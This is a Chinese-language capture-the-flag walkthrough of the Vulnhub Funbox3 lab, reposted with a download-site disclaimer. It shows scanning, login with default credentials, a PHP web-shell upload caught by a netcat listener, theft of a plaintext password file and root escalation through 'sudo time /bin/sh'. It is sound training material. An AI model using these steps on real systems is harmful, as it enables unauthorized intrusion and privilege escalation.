Funbox3
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:86:52:7b 1 60 PCS Systemtechnik GmbH
192.168.56.162 08:00:27:41:c1:af 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.162
NMAP 扫描
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 02:15 EST
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
| 256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_ 256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_gym
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=11/8%Time=636A0202%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:41:C1:AF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.61 seconds
Get Access
在Kali Linux利用浏览器访问80端口,返回apache默认页面。
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/robots.txt
Disallow: gym
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.162
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/08 02:20:31 Starting gobuster in directory enumeration mode
===============================================================
/store (Status: 301) [Size: 316] [--> http://192.168.56.162/store/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.162/admin/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.162/secret/]
/gym (Status: 301) [Size: 314] [--> http://192.168.56.162/gym/]
/server-status (Status: 403) [Size: 279]
Progress: 219643 / 220561 (99.58%)===============================================================
2022/11/08 02:21:04 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162/gym -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.162/gym
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/08 02:21:49 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/img/]
/profile (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/profile/]
/admin (Status: 301) [Size: 320] [--> http://192.168.56.162/gym/admin/]
/upload (Status: 301) [Size: 321] [--> http://192.168.56.162/gym/upload/]
/include (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/include/]
/LICENSE (Status: 200) [Size: 18025]
/att (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/att/]
/ex (Status: 301) [Size: 317] [--> http://192.168.56.162/gym/ex/]
/boot (Status: 301) [Size: 319] [--> http://192.168.56.162/gym/boot/]
Progress: 219077 / 220561 (99.33%)===============================================================
2022/11/08 02:22:20 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ dirb http://192.168.56.162
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 8 02:28:34 2022
URL_BASE: http://192.168.56.162/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.162/ ----
==> DIRECTORY: http://192.168.56.162/admin/
+ http://192.168.56.162/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.162/index.php (CODE:200|SIZE:3468)
+ http://192.168.56.162/robots.txt (CODE:200|SIZE:14)
==> DIRECTORY: http://192.168.56.162/secret/
+ http://192.168.56.162/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.162/store/
---- Entering directory: http://192.168.56.162/admin/ ----
==> DIRECTORY: http://192.168.56.162/admin/assets/
+ http://192.168.56.162/admin/index.php (CODE:200|SIZE:3263)
---- Entering directory: http://192.168.56.162/secret/ ----
+ http://192.168.56.162/secret/index.php (CODE:200|SIZE:108)
+ http://192.168.56.162/secret/robots.txt (CODE:200|SIZE:35)
---- Entering directory: http://192.168.56.162/store/ ----
+ http://192.168.56.162/store/admin.php (CODE:200|SIZE:3153)
==> DIRECTORY: http://192.168.56.162/store/controllers/
==> DIRECTORY: http://192.168.56.162/store/database/
==> DIRECTORY: http://192.168.56.162/store/functions/
+ http://192.168.56.162/store/index.php (CODE:200|SIZE:3998)
==> DIRECTORY: http://192.168.56.162/store/models/
==> DIRECTORY: http://192.168.56.162/store/template/
---- Entering directory: http://192.168.56.162/admin/assets/ ----
-----------------
END_TIME: Tue Nov 8 02:28:41 2022
DOWNLOADED: 18448 - FOUND: 9
扫描出了非常多的目录,其中/store/database中有用户名和密码。
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/store/database/readme.txt.txt
This is an simple online web store was made by using php , mysql and bootstrap.
the sql for database is put in folder sql.
the database contains many tables.
To change the localhost, username, password for connecting to database, change it only one time in
www_project/functions/database_functions.php -> db_connect() . Simple and fast
The base is localhost , root , , www_project
to connect the admin section, click the name Nghi Le Thanh at the bottom.
the name and pass for log in is admin , admin. Just to make it simple.
the 2 main things are not fully implemented is contact and process purchase.
Due to having to work with some security and online payment, the process site is just a place holder.
for futher questions, please let me know. my email: nghi.lethanh2@cou.fi
利用这里找到的用户名和密码: admin admin登录 /store/admin
成功登录,点击add new book
Can’t add new data Incorrect integer value: ” for column ‘publisherid’ at row 1
这里需要注意publisher,可以拷贝现有的Publisher
然后可以成功上传shell.php
那么这个shell.php存在什么地方呢,可以找任何一本书,然后定位书的图片的位置,所在目录中可以看到shell.php
http://192.168.56.162/store/bootstrap/img/
成功拿到了shell
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.162] 42364
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
07:39:53 up 30 min, 0 users, load average: 0.00, 0.04, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
cd /home
www-data@funbox3:/home$ ls -lah
ls -lah
total 12K
drwxr-xr-x 3 root root 4.0K Jul 30 2020 .
drwxr-xr-x 20 root root 4.0K Jul 30 2020 ..
drwxr-xr-x 3 tony tony 4.0K Jul 31 2020 tony
www-data@funbox3:/home$ cd tony
cd tony
www-data@funbox3:/home/tony$ ls -alh
ls -alh
total 36K
drwxr-xr-x 3 tony tony 4.0K Jul 31 2020 .
drwxr-xr-x 3 root root 4.0K Jul 30 2020 ..
-rw------- 1 tony tony 30 Jul 31 2020 .bash_history
-rw-r--r-- 1 tony tony 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 tony tony 3.7K Feb 25 2020 .bashrc
drwx------ 2 tony tony 4.0K Jul 30 2020 .cache
-rw-r--r-- 1 tony tony 807 Feb 25 2020 .profile
-rw-r--r-- 1 tony tony 0 Jul 30 2020 .sudo_as_admin_successful
-rw------- 1 tony tony 1.6K Jul 31 2020 .viminfo
-rw-rw-r-- 1 tony tony 70 Jul 31 2020 password.txt
www-data@funbox3:/home/tony$ cat passwod.txt
cat passwod.txt
cat: passwod.txt: No such file or directory
www-data@funbox3:/home/tony$ cat password.txt
cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
www-data@funbox3:/home/tony$ su - tony
su - tony
Password: yxcvbnmYYY
tony@funbox3:~$ id
id
uid=1000(tony) gid=1000(tony) groups=1000(tony),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
tony@funbox3:~$ sudo -l
sudo -l
Matching Defaults entries for tony on funbox3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tony may run the following commands on funbox3:
(root) NOPASSWD: /usr/bin/yelp
(root) NOPASSWD: /usr/bin/dmf
(root) NOPASSWD: /usr/bin/whois
(root) NOPASSWD: /usr/bin/rlogin
(root) NOPASSWD: /usr/bin/pkexec
(root) NOPASSWD: /usr/bin/mtr
(root) NOPASSWD: /usr/bin/finger
(root) NOPASSWD: /usr/bin/time
(root) NOPASSWD: /usr/bin/cancel
(root) NOPASSWD:
/root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
tony@funbox3:~$
有很明显的提示,tony的密码,这样就可以切换到用户tony
提权
tony@funbox3:~$ ls /root/root.txt
ls /root/root.txt
ls: cannot access '/root/root.txt': Permission denied
tony@funbox3:~$ sudo /usr/bin/time /bin/sh
sudo /usr/bin/time /bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
root.flag snap
# cat root.flag
cat root.flag
__________ ___. ___________
\_ _____/_ __ ____\_ |__ _______ ___ /\ \_ _____/____ _________.__.
| __)| | \/ \| __ \ / _ \ \/ / \/ | __)_\__ \ / ___< | |
| \ | | / | \ \_\ ( <_> > < /\ | \/ __ \_\___ \ \___ |
\___ / |____/|___| /___ /\____/__/\_ \ \/ /_______ (____ /____ >/ ____|
\/ \/ \/ \/ \/ \/ \/ \/
Made with ❤ from twitter@0815R2d2. Please, share this on twitter if you want.
#
提权很简单,参考GTFOBINS网站,最后选择time命令进行提权
成功拿到了root flag!!!
原文地址:http://www.cnblogs.com/jason-huawen/p/16870006.html
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,请务用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员!
8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载
声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性